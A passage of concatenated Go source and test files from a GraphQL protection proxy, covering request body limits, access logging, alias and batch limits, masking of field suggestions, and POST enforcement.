&config.Config{ 43 | Web: _http.Config{ 44 | ReadTimeout: 10 * time.Second, 45 | WriteTimeout: 10 * time.Second, 46 | IdleTimeout: 10 * time.Second, 47 | ShutdownTimeout: 10 * time.Second, 48 | Host: "localhost", 49 | Path: "/graphql", 50 | RequestBodyMaxBytes: 10, 51 | }, 52 | }, 53 | schema: nil, 54 | tokens: nil, 55 | maxBatch: nil, 56 | accessLogging: accesslogging.NewAccessLogging(accesslogging.Config{}, log), 57 | next: &noop{}, 58 | preFilterChain: func(next http.Handler) http.Handler { 59 | return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { 60 | next.ServeHTTP(w, r) 61 | }) 62 | }, 63 | }, 64 | want: `{"data":null,"errors":[{"message":"http: request body too large"}]} 65 | `, 66 | }, 67 | { 68 | name: "limit of 0 means no limit", 69 | fields: fields{ 70 | log: log, 71 | cfg: &config.Config{ 72 | Web: _http.Config{ 73 | ReadTimeout: 10 * time.Second, 74 | WriteTimeout: 10 * time.Second, 75 | IdleTimeout: 10 * time.Second, 76 | ShutdownTimeout: 10 * time.Second, 77 | Host: "localhost", 78 | Path: "/graphql", 79 | RequestBodyMaxBytes: 0, 80 | }, 81 | }, 82 | schema: nil, 83 | tokens: nil, 84 | maxBatch: nil, 85 | accessLogging: accesslogging.NewAccessLogging(accesslogging.Config{}, log), 86 | next: &noop{}, 87 | preFilterChain: func(next http.Handler) http.Handler { 88 | return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { 89 | next.ServeHTTP(w, r) 90 | }) 91 | }, 92 | }, 93 | // this assertion doesn't test the actual intended result, but shows that the request body limitation does not affect this request 94 | // ideally this should be improved at a later stage. 
95 | want: `{"data":null,"errors":[{"message":"invalid character 'i' looking for beginning of value"}]} 96 | `, 97 | }, 98 | { 99 | name: "request body limit does not interfere with request bodies with fewer bytes than the limit", 100 | fields: fields{ 101 | log: log, 102 | cfg: &config.Config{ 103 | Web: _http.Config{ 104 | ReadTimeout: 10 * time.Second, 105 | WriteTimeout: 10 * time.Second, 106 | IdleTimeout: 10 * time.Second, 107 | ShutdownTimeout: 10 * time.Second, 108 | Host: "localhost", 109 | Path: "/graphql", 110 | RequestBodyMaxBytes: 1_000_000, 111 | }, 112 | }, 113 | schema: nil, 114 | tokens: nil, 115 | maxBatch: nil, 116 | accessLogging: accesslogging.NewAccessLogging(accesslogging.Config{}, log), 117 | next: &noop{}, 118 | preFilterChain: func(next http.Handler) http.Handler { 119 | return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { 120 | next.ServeHTTP(w, r) 121 | }) 122 | }, 123 | }, 124 | // this assertion doesn't test the actual intended result, but shows that the request body limitation does not affect this request 125 | // ideally this should be improved at a later stage. 
126 | want: `{"data":null,"errors":[{"message":"invalid character 'i' looking for beginning of value"}]} 127 | `, 128 | }, 129 | } 130 | for _, tt := range tests { 131 | t.Run(tt.name, func(t *testing.T) { 132 | w := httptest.NewRecorder() 133 | r := httptest.NewRequest("POST", "/graphql", strings.NewReader("i am a body that exceeds the reader limit")) 134 | 135 | p := &GraphQLProtect{ 136 | log: tt.fields.log, 137 | cfg: tt.fields.cfg, 138 | schema: tt.fields.schema, 139 | tokens: tt.fields.tokens, 140 | maxBatch: tt.fields.maxBatch, 141 | accessLogging: tt.fields.accessLogging, 142 | next: tt.fields.next, 143 | preFilterChain: tt.fields.preFilterChain, 144 | } 145 | p.ServeHTTP(w, r) 146 | 147 | res := w.Result() 148 | assert.Equal(t, res.StatusCode, http.StatusOK) 149 | 150 | body, err := io.ReadAll(res.Body) 151 | assert.NoError(t, err) 152 | defer res.Body.Close() 153 | 154 | assert.Equal(t, tt.want, string(body)) 155 | }) 156 | } 157 | } 158 | 159 | type noop struct { 160 | } 161 | 162 | func (n *noop) ServeHTTP(_ http.ResponseWriter, _ *http.Request) {} 163 | -------------------------------------------------------------------------------- /internal/business/rules/accesslogging/accesslogging.go: -------------------------------------------------------------------------------- 1 | package accesslogging 2 | 3 | import ( 4 | "github.com/supportivefe/graphql-protect/internal/business/gql" 5 | "log/slog" 6 | "net/http" 7 | ) 8 | 9 | type Config struct { 10 | Enabled bool `yaml:"enabled"` 11 | IncludedHeaders []string `yaml:"include_headers"` 12 | IncludeOperationName bool `yaml:"include_operation_name"` 13 | IncludeVariables bool `yaml:"include_variables"` 14 | IncludePayload bool `yaml:"include_payload"` 15 | } 16 | 17 | func DefaultConfig() Config { 18 | return Config{ 19 | Enabled: true, 20 | IncludedHeaders: nil, 21 | IncludeOperationName: true, 22 | IncludeVariables: true, 23 | IncludePayload: false, 24 | } 25 | } 26 | 27 | type AccessLogging struct { 28 | log 
*slog.Logger 29 | enabled bool 30 | includeHeaders map[string]bool 31 | includeOperationName bool 32 | includeVariables bool 33 | includePayload bool 34 | } 35 | 36 | func NewAccessLogging(cfg Config, log *slog.Logger) *AccessLogging { 37 | headers := map[string]bool{} 38 | for _, header := range cfg.IncludedHeaders { 39 | headers[header] = true 40 | } 41 | 42 | return &AccessLogging{ 43 | log: log.WithGroup("access-logging"), 44 | enabled: cfg.Enabled, 45 | includeHeaders: headers, 46 | includeOperationName: cfg.IncludeOperationName, 47 | includeVariables: cfg.IncludeVariables, 48 | includePayload: cfg.IncludePayload, 49 | } 50 | } 51 | 52 | func (a *AccessLogging) Log(payloads []gql.RequestData, headers http.Header) { 53 | if !a.enabled { 54 | return 55 | } 56 | 57 | headersToInclude := map[string]interface{}{} 58 | for key := range a.includeHeaders { 59 | headersToInclude[key] = headers.Values(key) 60 | } 61 | 62 | for _, req := range payloads { 63 | al := accessLog{} 64 | 65 | if a.includeOperationName { 66 | al.WithOperationName(req.OperationName) 67 | } 68 | if a.includeVariables { 69 | al.WithVariables(req.Variables) 70 | } 71 | if a.includePayload { 72 | al.WithPayload(req.Query) 73 | } 74 | 75 | al.WithHeaders(headersToInclude) 76 | 77 | a.log.Info("record", "payload", al) 78 | } 79 | } 80 | -------------------------------------------------------------------------------- /internal/business/rules/accesslogging/accesslogging_test.go: -------------------------------------------------------------------------------- 1 | package accesslogging 2 | 3 | import ( 4 | "context" 5 | "github.com/supportivefe/graphql-protect/internal/business/gql" 6 | "github.com/stretchr/testify/assert" 7 | "log/slog" 8 | "net/http" 9 | "testing" 10 | ) 11 | 12 | type testLogHandler struct { 13 | assert func(ctx context.Context, record slog.Record) error 14 | count int 15 | } 16 | 17 | func (t *testLogHandler) Enabled(context.Context, slog.Level) bool { 18 | return true 19 | } 20 | 
func (t *testLogHandler) Handle(ctx context.Context, record slog.Record) error { 21 | t.count++ 22 | return t.assert(ctx, record) 23 | } 24 | func (t *testLogHandler) WithAttrs(_ []slog.Attr) slog.Handler { 25 | return t 26 | } 27 | func (t *testLogHandler) WithGroup(_ string) slog.Handler { 28 | return t 29 | } 30 | 31 | func TestAccessLogging_Log(t *testing.T) { 32 | type args struct { 33 | cfg Config 34 | payloads []gql.RequestData 35 | headers http.Header 36 | count int 37 | } 38 | tests := []struct { 39 | name string 40 | args args 41 | want func(ctx context.Context, record slog.Record) error 42 | }{ 43 | { 44 | name: "logs expected fields when enabled", 45 | args: args{ 46 | cfg: Config{ 47 | Enabled: true, 48 | IncludedHeaders: []string{"Authorization", "not-case-sensitive"}, 49 | IncludeOperationName: true, 50 | IncludeVariables: true, 51 | IncludePayload: true, 52 | }, 53 | payloads: []gql.RequestData{ 54 | { 55 | OperationName: "Foobar", 56 | Variables: map[string]interface{}{ 57 | "foo": "bar", 58 | }, 59 | Query: "query Foo { id name }", 60 | }, 61 | }, 62 | headers: map[string][]string{ 63 | "Authorization": {"bearer hello"}, 64 | "Content-Type": {"application/json"}, 65 | "Not-Case-Sensitive": {"yes"}, 66 | }, 67 | count: 1, 68 | }, 69 | want: func(_ context.Context, record slog.Record) error { 70 | assert.Equal(t, 1, record.NumAttrs()) 71 | record.Attrs(func(a slog.Attr) bool { 72 | assert.Equal(t, "payload", a.Key) 73 | 74 | al := a.Value.Any().(accessLog) 75 | 76 | assert.Equal(t, "Foobar", al.OperationName) 77 | assert.Equal(t, "query Foo { id name }", al.Payload) 78 | assert.Equal(t, map[string]interface{}{ 79 | "foo": "bar", 80 | }, al.Variables) 81 | assert.Equal(t, map[string]interface{}{ 82 | "Authorization": []string{"bearer hello"}, 83 | "not-case-sensitive": []string{"yes"}, 84 | }, al.Headers) 85 | 86 | return true 87 | }) 88 | 89 | return nil 90 | }, 91 | }, 92 | { 93 | name: "logs nothing when disabled", 94 | args: args{ 95 | cfg: 
Config{ 96 | Enabled: false, 97 | IncludedHeaders: []string{"Authorization"}, 98 | IncludeOperationName: true, 99 | IncludeVariables: true, 100 | IncludePayload: true, 101 | }, 102 | payloads: []gql.RequestData{ 103 | { 104 | OperationName: "Foobar", 105 | Variables: map[string]interface{}{ 106 | "foo": "bar", 107 | }, 108 | Query: "query Foo { id name }", 109 | }, 110 | }, 111 | headers: map[string][]string{ 112 | "Authorization": {"bearer hello"}, 113 | "Content-Type": {"application/json"}, 114 | }, 115 | count: 0, 116 | }, 117 | want: func(_ context.Context, _ slog.Record) error { 118 | assert.Fail(t, "should never reach here") 119 | return nil 120 | }, 121 | }, 122 | } 123 | for _, tt := range tests { 124 | t.Run(tt.name, func(t *testing.T) { 125 | handler := &testLogHandler{assert: tt.want} 126 | log := slog.New(handler) 127 | 128 | a := NewAccessLogging(tt.args.cfg, log) 129 | a.log = log 130 | a.Log(tt.args.payloads, tt.args.headers) 131 | 132 | assert.Equal(t, tt.args.count, a.log.Handler().(*testLogHandler).count) 133 | }) 134 | } 135 | } 136 | -------------------------------------------------------------------------------- /internal/business/rules/accesslogging/model.go: -------------------------------------------------------------------------------- 1 | package accesslogging 2 | 3 | type accessLog struct { 4 | OperationName string `json:"operationName,omitempty"` 5 | Variables map[string]interface{} `json:"variables,omitempty"` 6 | Payload string `json:"payload,omitempty"` 7 | Headers map[string]interface{} `json:"headers,omitempty"` 8 | } 9 | 10 | func (a *accessLog) WithOperationName(name string) { 11 | a.OperationName = name 12 | } 13 | 14 | func (a *accessLog) WithVariables(variables map[string]interface{}) { 15 | a.Variables = variables 16 | } 17 | 18 | func (a *accessLog) WithPayload(payload string) { 19 | a.Payload = payload 20 | } 21 | 22 | func (a *accessLog) WithHeaders(headers map[string]interface{}) { 23 | a.Headers = headers 24 | } 25 | 
// Package aliases implements the max-aliases protection rule, which limits
// how many aliased fields a single GraphQL request may contain.
package aliases

import (
	"github.com/prometheus/client_golang/prometheus"
	"github.com/vektah/gqlparser/v2/ast"
	"github.com/vektah/gqlparser/v2/validator"
)

var (
	// resultCounter tracks how often the rule allowed, failed (observe-only),
	// or rejected a request.
	resultCounter = prometheus.NewCounterVec(prometheus.CounterOpts{
		Namespace: "graphql_protect",
		Subsystem: "max_aliases",
		Name:      "results",
		Help:      "The results of the max aliases rule",
	},
		[]string{"result"},
	)
)

// Config holds the max-aliases rule settings.
type Config struct {
	Enabled         bool `yaml:"enabled"`
	Max             int  `yaml:"max"`
	RejectOnFailure bool `yaml:"reject_on_failure"`
}

// DefaultConfig returns the defaults: enabled, at most 15 aliases, rejecting
// requests that exceed the limit.
func DefaultConfig() Config {
	return Config{
		Enabled:         true,
		Max:             15,
		RejectOnFailure: true,
	}
}

func init() {
	prometheus.MustRegister(resultCounter)
}

// NewMaxAliasesRule registers the "MaxAliases" rule with the global gqlparser
// validator when enabled. Each validation walk keeps a running alias count
// that is shared between the fragment-spread and operation callbacks, so
// aliases inside spread fragments count towards the operation's total.
func NewMaxAliasesRule(cfg Config) {
	if cfg.Enabled {
		validator.AddRule("MaxAliases", func(observers *validator.Events, addError validator.AddErrFunc) {
			aliases := 0
			// keep track of # of aliases per fragment definition
			visitedFragments := make(map[string]int)

			observers.OnFragmentSpread(func(_ *validator.Walker, fragmentSpread *ast.FragmentSpread) {
				definition := fragmentSpread.Definition
				// Count a fragment's aliases once and cache the result; every
				// subsequent spread of the same fragment re-adds the cached
				// count rather than re-walking the selection set.
				if _, ok := visitedFragments[definition.Name]; !ok {
					count := countSelectionSet(definition.SelectionSet)
					visitedFragments[definition.Name] = count
				}

				aliases += visitedFragments[definition.Name]
			})

			observers.OnOperation(func(_ *validator.Walker, operation *ast.OperationDefinition) {
				aliases += countAliases(operation)

				if aliases > cfg.Max {
					if cfg.RejectOnFailure {
						addError(
							validator.Message("syntax error: Aliases limit of %d exceeded, found %d", cfg.Max, aliases),
							validator.At(operation.Position),
						)
						resultCounter.WithLabelValues("rejected").Inc()
					} else {
						// Observe-only mode: record the violation but let the
						// request through.
						resultCounter.WithLabelValues("failed").Inc()
					}
				} else {
					resultCounter.WithLabelValues("allowed").Inc()
				}
			})
		})
	}
}

// countAliases returns the number of aliased fields in the operation's own
// selection set (fragment spreads are accounted for via OnFragmentSpread).
func countAliases(operation *ast.OperationDefinition) int {
	return countSelectionSet(operation.SelectionSet)
}

// countSelectionSet recursively counts fields whose alias differs from the
// field name. An alias equal to the field name is the parser's default and is
// not counted as a user-supplied alias.
func countSelectionSet(set ast.SelectionSet) int {
	count := 0
	if len(set) == 0 {
		return count
	}

	for _, selection := range set {
		if v, ok := selection.(*ast.Field); ok {
			// When a query has no alias defined it defaults to the name of the query
			if v.Alias != "" && v.Alias != v.Name {
				count++
			}

			count += countSelectionSet(v.SelectionSet)
		}
	}

	return count
}
21 | title: String 22 | author: String 23 | }` 24 | 25 | q := `query { 26 | firstBooks: getBook(title: "null") { 27 | author 28 | title 29 | } 30 | secondBooks: getBook(title: "null") { 31 | author 32 | title 33 | } 34 | }` 35 | 36 | type args struct { 37 | query string 38 | schema string 39 | cfg Config 40 | } 41 | tests := []struct { 42 | name string 43 | args args 44 | want error 45 | }{ 46 | { 47 | name: "no aliases yields zero count", 48 | args: args{ 49 | query: q, 50 | schema: schema, 51 | cfg: Config{ 52 | Max: 15, 53 | Enabled: true, 54 | }, 55 | }, 56 | want: nil, 57 | }, 58 | { 59 | name: "does not produce error when counted aliases are more than configured maximum and reject on failure is false", 60 | args: args{ 61 | cfg: Config{ 62 | Enabled: true, 63 | Max: 1, 64 | RejectOnFailure: false, 65 | }, 66 | query: q, 67 | schema: schema, 68 | }, 69 | want: nil, 70 | }, 71 | { 72 | name: "produces error when counted aliases are more than configured maximum and reject on failure is true", 73 | args: args{ 74 | cfg: Config{ 75 | Max: 1, 76 | Enabled: true, 77 | RejectOnFailure: true, 78 | }, 79 | query: q, 80 | schema: schema, 81 | }, 82 | want: fmt.Errorf("syntax error: Aliases limit of %d exceeded, found %d", 1, 2), 83 | }, 84 | { 85 | name: "respects fragment aliases", 86 | args: args{ 87 | query: `query A { 88 | getBook(title: "null") { 89 | firstTitle: title 90 | ...BookFragment 91 | } 92 | } 93 | fragment BookFragment on Book { 94 | secondTitle: title 95 | }`, 96 | schema: schema, 97 | cfg: Config{ 98 | Max: 1, 99 | Enabled: true, 100 | RejectOnFailure: true, 101 | }, 102 | }, 103 | want: fmt.Errorf("syntax error: Aliases limit of %d exceeded, found %d", 1, 2), 104 | }, 105 | } 106 | for _, tt := range tests { 107 | t.Run(tt.name, func(t *testing.T) { 108 | NewMaxAliasesRule(tt.args.cfg) 109 | 110 | query, _ := parser.ParseQuery(&ast.Source{Name: "ff", Input: tt.args.query}) 111 | schema := gqlparser.MustLoadSchema(&ast.Source{ 112 | Name: 
"graph/schema.graphqls", 113 | Input: tt.args.schema, 114 | BuiltIn: false, 115 | }) 116 | 117 | errs := validator.Validate(schema, query) 118 | 119 | if tt.want == nil { 120 | assert.Empty(t, errs) 121 | } else { 122 | assert.Equal(t, tt.want.Error(), errs[0].Message) 123 | } 124 | }) 125 | } 126 | } 127 | -------------------------------------------------------------------------------- /internal/business/rules/batch/batch.go: -------------------------------------------------------------------------------- 1 | package batch 2 | 3 | import ( 4 | "errors" 5 | "fmt" 6 | "github.com/supportivefe/graphql-protect/internal/business/gql" 7 | "github.com/prometheus/client_golang/prometheus" 8 | "strconv" 9 | ) 10 | 11 | var ( 12 | resultCounter = prometheus.NewCounterVec(prometheus.CounterOpts{ 13 | Namespace: "graphql_protect", 14 | Subsystem: "max_batch", 15 | Name: "results", 16 | Help: "The results of the max batch rule, including the size of the batch. The actual size is only tracked for allowed operations, to prevent excessive metric generation on malicious iput", 17 | }, 18 | []string{"result", "size"}, 19 | ) 20 | ErrMaxBatchSizeTooSmall = errors.New("maximum allowed batch size cannot be smaller than 1. 
Protection auto-disabled") 21 | ) 22 | 23 | type Config struct { 24 | Enabled bool `yaml:"enabled"` 25 | Max int `yaml:"max"` 26 | RejectOnFailure bool `yaml:"reject_on_failure"` 27 | } 28 | 29 | func DefaultConfig() Config { 30 | return Config{ 31 | Enabled: true, 32 | Max: 1, 33 | RejectOnFailure: true, 34 | } 35 | } 36 | 37 | func init() { 38 | prometheus.MustRegister(resultCounter) 39 | } 40 | 41 | type MaxBatchRule struct { 42 | cfg Config 43 | } 44 | 45 | func NewMaxBatch(cfg Config) (*MaxBatchRule, error) { 46 | if cfg.Max < 1 { 47 | return &MaxBatchRule{ 48 | cfg: Config{ 49 | Enabled: false, 50 | }, 51 | }, ErrMaxBatchSizeTooSmall 52 | } 53 | 54 | return &MaxBatchRule{ 55 | cfg: cfg, 56 | }, nil 57 | } 58 | 59 | func (t *MaxBatchRule) Validate(payload []gql.RequestData) error { 60 | if !t.cfg.Enabled { 61 | return nil 62 | } 63 | 64 | if len(payload) > t.cfg.Max { 65 | if t.cfg.RejectOnFailure { 66 | resultCounter.WithLabelValues("rejected", "exceeded").Inc() 67 | return fmt.Errorf("operation has exceeded maximum batch size. 
found [%d], max [%d]", len(payload), t.cfg.Max) 68 | } 69 | resultCounter.WithLabelValues("failed", "exceeded").Inc() 70 | return nil 71 | } 72 | 73 | size := strconv.Itoa(len(payload)) 74 | 75 | resultCounter.WithLabelValues("allowed", size).Inc() 76 | return nil 77 | } 78 | -------------------------------------------------------------------------------- /internal/business/rules/batch/batch_test.go: -------------------------------------------------------------------------------- 1 | package batch 2 | 3 | import ( 4 | "github.com/supportivefe/graphql-protect/internal/business/gql" 5 | "github.com/stretchr/testify/assert" 6 | "testing" 7 | ) 8 | 9 | func TestMaxBatchRule_Validate(t1 *testing.T) { 10 | type fields struct { 11 | cfg Config 12 | } 13 | type args struct { 14 | payload []gql.RequestData 15 | } 16 | tests := []struct { 17 | name string 18 | fields fields 19 | args args 20 | wantErr bool 21 | initErr bool 22 | }{ 23 | { 24 | name: "disabled has no effect", 25 | fields: fields{ 26 | cfg: Config{ 27 | Enabled: false, 28 | Max: 1, 29 | RejectOnFailure: true, 30 | }, 31 | }, 32 | args: args{ 33 | payload: []gql.RequestData{ 34 | { 35 | Query: "", 36 | Extensions: gql.Extensions{}, 37 | }, 38 | { 39 | Query: "", 40 | Extensions: gql.Extensions{}, 41 | }, 42 | { 43 | Query: "", 44 | Extensions: gql.Extensions{}, 45 | }, 46 | }, 47 | }, 48 | wantErr: false, 49 | initErr: false, 50 | }, 51 | { 52 | name: "less than limit passes", 53 | fields: fields{ 54 | cfg: Config{ 55 | Enabled: true, 56 | Max: 3, 57 | RejectOnFailure: true, 58 | }, 59 | }, 60 | args: args{ 61 | payload: []gql.RequestData{ 62 | { 63 | Query: "", 64 | Extensions: gql.Extensions{}, 65 | }, 66 | }, 67 | }, 68 | wantErr: false, 69 | initErr: false, 70 | }, 71 | { 72 | name: "more than limit throws", 73 | fields: fields{ 74 | cfg: Config{ 75 | Enabled: true, 76 | Max: 1, 77 | RejectOnFailure: true, 78 | }, 79 | }, 80 | args: args{ 81 | payload: []gql.RequestData{ 82 | { 83 | Query: "", 84 | 
Extensions: gql.Extensions{}, 85 | }, 86 | { 87 | Query: "", 88 | Extensions: gql.Extensions{}, 89 | }, 90 | { 91 | Query: "", 92 | Extensions: gql.Extensions{}, 93 | }, 94 | }, 95 | }, 96 | wantErr: true, 97 | initErr: false, 98 | }, 99 | { 100 | name: "invalid config auto disables", 101 | fields: fields{ 102 | cfg: Config{ 103 | Enabled: true, 104 | Max: 0, 105 | RejectOnFailure: true, 106 | }, 107 | }, 108 | args: args{ 109 | payload: []gql.RequestData{ 110 | { 111 | Query: "", 112 | Extensions: gql.Extensions{}, 113 | }, 114 | { 115 | Query: "", 116 | Extensions: gql.Extensions{}, 117 | }, 118 | { 119 | Query: "", 120 | Extensions: gql.Extensions{}, 121 | }, 122 | }, 123 | }, 124 | wantErr: false, 125 | initErr: true, 126 | }, 127 | } 128 | for _, tt := range tests { 129 | t1.Run(tt.name, func(t1 *testing.T) { 130 | t, err := NewMaxBatch(tt.fields.cfg) 131 | if tt.initErr { 132 | assert.Error(t1, err) 133 | } 134 | 135 | if err := t.Validate(tt.args.payload); (err != nil) != tt.wantErr { 136 | t1.Errorf("Validate() error = %v, wantErr %v", err, tt.wantErr) 137 | } 138 | }) 139 | } 140 | } 141 | -------------------------------------------------------------------------------- /internal/business/rules/block_field_suggestions/block_field_suggestions.go: -------------------------------------------------------------------------------- 1 | package block_field_suggestions // nolint:revive 2 | 3 | import ( 4 | "github.com/prometheus/client_golang/prometheus" 5 | "strings" 6 | ) 7 | 8 | var resultCounter = prometheus.NewCounterVec(prometheus.CounterOpts{ 9 | Namespace: "graphql_protect", 10 | Subsystem: "block_field_suggestions", 11 | Name: "results", 12 | Help: "The results of the block field suggestions rule", 13 | }, 14 | []string{"result"}, 15 | ) 16 | 17 | type Config struct { 18 | Enabled bool `yaml:"enabled"` 19 | Mask string `yaml:"mask"` 20 | } 21 | 22 | func DefaultConfig() Config { 23 | return Config{ 24 | Enabled: true, 25 | Mask: "[redacted]", 26 | } 27 | } 
28 | 29 | type BlockFieldSuggestionsHandler struct { 30 | cfg Config 31 | } 32 | 33 | func init() { 34 | prometheus.MustRegister(resultCounter) 35 | } 36 | 37 | func NewBlockFieldSuggestionsHandler(cfg Config) *BlockFieldSuggestionsHandler { 38 | return &BlockFieldSuggestionsHandler{ 39 | cfg: cfg, 40 | } 41 | } 42 | 43 | func (b *BlockFieldSuggestionsHandler) Enabled() bool { 44 | return b.cfg.Enabled 45 | } 46 | 47 | func (b *BlockFieldSuggestionsHandler) ProcessBody(payload map[string]interface{}) map[string]interface{} { 48 | if val, ok1 := payload["errors"]; ok1 { 49 | payload["errors"] = b.processErrors(val) 50 | } 51 | return payload 52 | } 53 | 54 | func (b *BlockFieldSuggestionsHandler) processErrors(payload interface{}) interface{} { 55 | switch payload := payload.(type) { 56 | case []map[string]interface{}: 57 | for _, err := range payload { 58 | _ = b.processError(err) 59 | } 60 | case []interface{}: 61 | for _, err := range payload { 62 | e, ok2 := err.(map[string]interface{}) 63 | if !ok2 { 64 | continue 65 | } 66 | _ = b.processError(e) 67 | } 68 | } 69 | return payload 70 | } 71 | 72 | func (b *BlockFieldSuggestionsHandler) processError(err map[string]interface{}) map[string]interface{} { 73 | if msg, ok4 := err["message"]; ok4 { 74 | if message, ok := msg.(string); ok { 75 | err["message"] = b.replaceSuggestions(message) 76 | } 77 | } 78 | return err 79 | } 80 | 81 | func (b *BlockFieldSuggestionsHandler) replaceSuggestions(message string) string { 82 | if strings.HasPrefix(message, "Did you mean") { 83 | resultCounter.WithLabelValues("masked").Inc() 84 | return b.cfg.Mask 85 | } 86 | resultCounter.WithLabelValues("unmasked").Inc() 87 | return message 88 | } 89 | -------------------------------------------------------------------------------- /internal/business/rules/block_field_suggestions/block_field_suggestions_test.go: -------------------------------------------------------------------------------- 1 | package block_field_suggestions // 
nolint:revive 2 | 3 | import ( 4 | "reflect" 5 | "testing" 6 | ) 7 | 8 | func TestProcessBody(t *testing.T) { 9 | type args struct { 10 | payload map[string]interface{} 11 | } 12 | tests := []struct { 13 | name string 14 | args args 15 | want map[string]interface{} 16 | }{ 17 | { 18 | name: "nothing happens when not expected format", 19 | args: args{ 20 | payload: map[string]interface{}{ 21 | "hi": "bye", 22 | }, 23 | }, 24 | want: map[string]interface{}{ 25 | "hi": "bye", 26 | }, 27 | }, 28 | { 29 | name: "processes errors payload", 30 | args: args{ 31 | payload: map[string]interface{}{ 32 | "errors": []map[string]interface{}{ 33 | { 34 | "message": "hello", 35 | }, 36 | }, 37 | }, 38 | }, 39 | want: map[string]interface{}{ 40 | "errors": []map[string]interface{}{ 41 | { 42 | "message": "hello", 43 | }, 44 | }, 45 | }, 46 | }, 47 | { 48 | name: "can handle unexpected types", 49 | args: args{ 50 | payload: map[string]interface{}{ 51 | "errors": []map[string]interface{}{ 52 | { 53 | "message": 1, 54 | }, 55 | }, 56 | }, 57 | }, 58 | want: map[string]interface{}{ 59 | "errors": []map[string]interface{}{ 60 | { 61 | "message": 1, 62 | }, 63 | }, 64 | }, 65 | }, 66 | { 67 | name: "Replaces suggestions when found", 68 | args: args{ 69 | payload: map[string]interface{}{ 70 | "errors": []map[string]interface{}{ 71 | { 72 | "message": "Did you mean 'foobar'?", 73 | }, 74 | }, 75 | }, 76 | }, 77 | want: map[string]interface{}{ 78 | "errors": []map[string]interface{}{ 79 | { 80 | "message": "[redacted]", 81 | }, 82 | }, 83 | }, 84 | }, 85 | { 86 | name: "Doesn't affect any other fields", 87 | args: args{ 88 | payload: map[string]interface{}{ 89 | "data": map[string]interface{}{ 90 | "foo": "bar", 91 | "boolean": 1, 92 | }, 93 | "errors": []map[string]interface{}{ 94 | { 95 | "message": "Did you mean 'foobar'?", 96 | "something": "else", 97 | }, 98 | { 99 | "without": "message", 100 | }, 101 | }, 102 | }, 103 | }, 104 | want: map[string]interface{}{ 105 | "data": 
map[string]interface{}{ 106 | "foo": "bar", 107 | "boolean": 1, 108 | }, 109 | "errors": []map[string]interface{}{ 110 | { 111 | "message": "[redacted]", 112 | "something": "else", 113 | }, 114 | { 115 | "without": "message", 116 | }, 117 | }, 118 | }, 119 | }, 120 | } 121 | for _, tt := range tests { 122 | t.Run(tt.name, func(t *testing.T) { 123 | b := NewBlockFieldSuggestionsHandler(Config{ 124 | Enabled: true, 125 | Mask: "[redacted]", 126 | }) 127 | 128 | if got := b.ProcessBody(tt.args.payload); !reflect.DeepEqual(got, tt.want) { 129 | t.Errorf("ProcessBody() = %v, want %v", got, tt.want) 130 | } 131 | }) 132 | } 133 | } 134 | -------------------------------------------------------------------------------- /internal/business/rules/enforce_post/enforce_post.go: -------------------------------------------------------------------------------- 1 | package enforce_post // nolint:revive 2 | 3 | import ( 4 | "github.com/prometheus/client_golang/prometheus" 5 | "net/http" 6 | ) 7 | 8 | var methodCounter = prometheus.NewCounterVec(prometheus.CounterOpts{ 9 | Namespace: "graphql_protect", 10 | Subsystem: "enforce_post", 11 | Name: "count", 12 | Help: "Amount of times the enforce POST rule was triggered and blocked a request", 13 | }, 14 | []string{}, 15 | ) 16 | 17 | func init() { 18 | prometheus.MustRegister(methodCounter) 19 | } 20 | 21 | type Config struct { 22 | Enabled bool `yaml:"enabled"` 23 | } 24 | 25 | func DefaultConfig() Config { 26 | return Config{ 27 | Enabled: true, 28 | } 29 | } 30 | 31 | func EnforcePostMethod(cfg Config) func(next http.Handler) http.Handler { 32 | return func(next http.Handler) http.Handler { 33 | fn := func(w http.ResponseWriter, r *http.Request) { 34 | if !cfg.Enabled { 35 | next.ServeHTTP(w, r) 36 | return 37 | } 38 | 39 | query := r.URL.Query() 40 | 41 | if r.Method != "POST" && (query.Has("query") || query.Has("extensions")) { 42 | methodCounter.WithLabelValues().Inc() 43 | http.Error(w, "405 - method not allowed", 
http.StatusMethodNotAllowed) 44 | return 45 | } 46 | 47 | next.ServeHTTP(w, r) 48 | } 49 | return http.HandlerFunc(fn) 50 | } 51 | } 52 | -------------------------------------------------------------------------------- /internal/business/rules/enforce_post/enforce_post_test.go: -------------------------------------------------------------------------------- 1 | package enforce_post // nolint:revive 2 | 3 | import ( 4 | "github.com/stretchr/testify/assert" 5 | "net/http" 6 | "net/http/httptest" 7 | "testing" 8 | ) 9 | 10 | func TestDisableMethodRule(t *testing.T) { 11 | type args struct { 12 | cfg Config 13 | request *http.Request 14 | } 15 | tests := []struct { 16 | name string 17 | args args 18 | want func(res *http.Response) 19 | }{ 20 | { 21 | name: "does not block when disabled", 22 | args: args{ 23 | cfg: Config{ 24 | Enabled: false, 25 | }, 26 | request: func() *http.Request { 27 | return httptest.NewRequest("GET", "/graphql", nil) 28 | }(), 29 | }, 30 | want: func(res *http.Response) { 31 | assert.Equal(t, 200, res.StatusCode) 32 | }, 33 | }, 34 | { 35 | name: "does not block GETs that contain no operation (for i.e. 
graphiql access)", 36 | args: args{ 37 | cfg: Config{ 38 | Enabled: true, 39 | }, 40 | request: func() *http.Request { 41 | return httptest.NewRequest("GET", "/graphql", nil) 42 | }(), 43 | }, 44 | want: func(res *http.Response) { 45 | assert.Equal(t, 200, res.StatusCode) 46 | }, 47 | }, 48 | { 49 | name: "does block GETs that contain an operation", 50 | args: args{ 51 | cfg: Config{ 52 | Enabled: true, 53 | }, 54 | request: func() *http.Request { 55 | return httptest.NewRequest("GET", "/graphql?query=foobar&variables=something", nil) 56 | }(), 57 | }, 58 | want: func(res *http.Response) { 59 | assert.Equal(t, http.StatusMethodNotAllowed, res.StatusCode) 60 | }, 61 | }, 62 | { 63 | name: "does block GETs that contain extensions for blocking persisted operations", 64 | args: args{ 65 | cfg: Config{ 66 | Enabled: true, 67 | }, 68 | request: func() *http.Request { 69 | return httptest.NewRequest("GET", "/graphql?extensions=something", nil) 70 | }(), 71 | }, 72 | want: func(res *http.Response) { 73 | assert.Equal(t, http.StatusMethodNotAllowed, res.StatusCode) 74 | }, 75 | }, 76 | { 77 | name: "does block PUT that contain extensions for blocking persisted operations", 78 | args: args{ 79 | cfg: Config{ 80 | Enabled: true, 81 | }, 82 | request: func() *http.Request { 83 | return httptest.NewRequest("PUT", "/graphql?extensions=something", nil) 84 | }(), 85 | }, 86 | want: func(res *http.Response) { 87 | 